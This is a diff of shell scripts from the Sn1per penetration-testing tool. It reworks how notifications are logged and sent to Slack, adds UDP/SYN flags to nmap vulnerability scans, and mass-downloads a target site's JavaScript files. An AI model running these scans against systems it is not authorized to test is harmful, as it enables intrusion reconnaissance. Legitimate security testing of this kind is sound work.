||||
for a in `cat $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null`
|
||||
do
|
||||
diff $LOOT_DIR/nmap/ports-$a.old $LOOT_DIR/nmap/ports-$a.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$a.diff 2> /dev/null
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]] && [[ -s "$LOOT_DIR/nmap/ports-$a.diff" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Port change detected on $a (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$a.diff"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $a (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/nmap/ports-$a.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications.txt
|
||||
if [[ -s "$LOOT_DIR/nmap/ports-$a.diff" ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $a (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/nmap/ports-$a.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Port change detected on $a (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$a.diff"
|
||||
fi
|
||||
fi
|
||||
done
|
||||
sed -i -E 's/,//g' $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/scans/running_${WORKSPACE}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -23,21 +23,19 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
exit
|
||||
fi
|
||||
logo
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
|
||||
if [[ -f "/usr/share/sniper/pro/.portscanner.conf" ]]; then
|
||||
source /usr/share/sniper/pro/.portscanner.conf
|
||||
fi
|
||||
|
||||
if [[ -z "$PORT" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap $NMAP_OPTIONS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
|
|
@ -45,7 +43,7 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap $NMAP_OPTIONS --script=/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
|
|
@ -54,39 +52,34 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
if [[ ${#HOST_UP} -ge 2 ]]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
|
||||
|
||||
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
|
||||
done
|
||||
|
||||
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
|
||||
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
|
||||
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
|
||||
fi
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]] && [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
|
||||
fi
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET"
|
||||
|
|
@ -104,11 +97,9 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -6,12 +6,12 @@ else
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
|
||||
nmap $NMAP_OPTIONS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
|
|
@ -39,14 +39,16 @@ else
|
|||
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]] && [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/nmap/ports-$TARGET.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications.txt
|
||||
if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/nmap/ports-$TARGET.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
fi
|
||||
|
|
@ -3,8 +3,8 @@
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DOWNLOADING ALL JAVASCRIPT FILES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt | egrep -v '.json|.jsp'
|
||||
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt | egrep -v '.json|.jsp' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp'
|
||||
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -i 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -iv 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - https://$a" && FILENAME=$(echo "https://$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
|
|||
|
|
@ -51,7 +51,6 @@ if [[ "$MODE" = "massportscan" ]]; then
|
|||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
|
|
@ -62,9 +61,9 @@ if [[ "$MODE" = "massportscan" ]]; then
|
|||
args=""
|
||||
done
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -49,9 +49,9 @@ if [[ "$MODE" = "massvulnscan" ]]; then
|
|||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
|
|
@ -62,9 +62,9 @@ if [[ "$MODE" = "massvulnscan" ]]; then
|
|||
args=""
|
||||
done
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -49,22 +49,21 @@ if [[ "$MODE" = "massweb" ]]; then
|
|||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
#echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
#echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
fi
|
||||
args=""
|
||||
done
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -27,9 +27,9 @@ if [[ "$MODE" = "masswebscan" ]]; then
|
|||
args="$args -t $TARGET"
|
||||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
|
|
@ -40,9 +40,9 @@ if [[ "$MODE" = "masswebscan" ]]; then
|
|||
done
|
||||
fi
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
|
|
|
|||
313
modes/normal.sh
313
modes/normal.sh
|
|
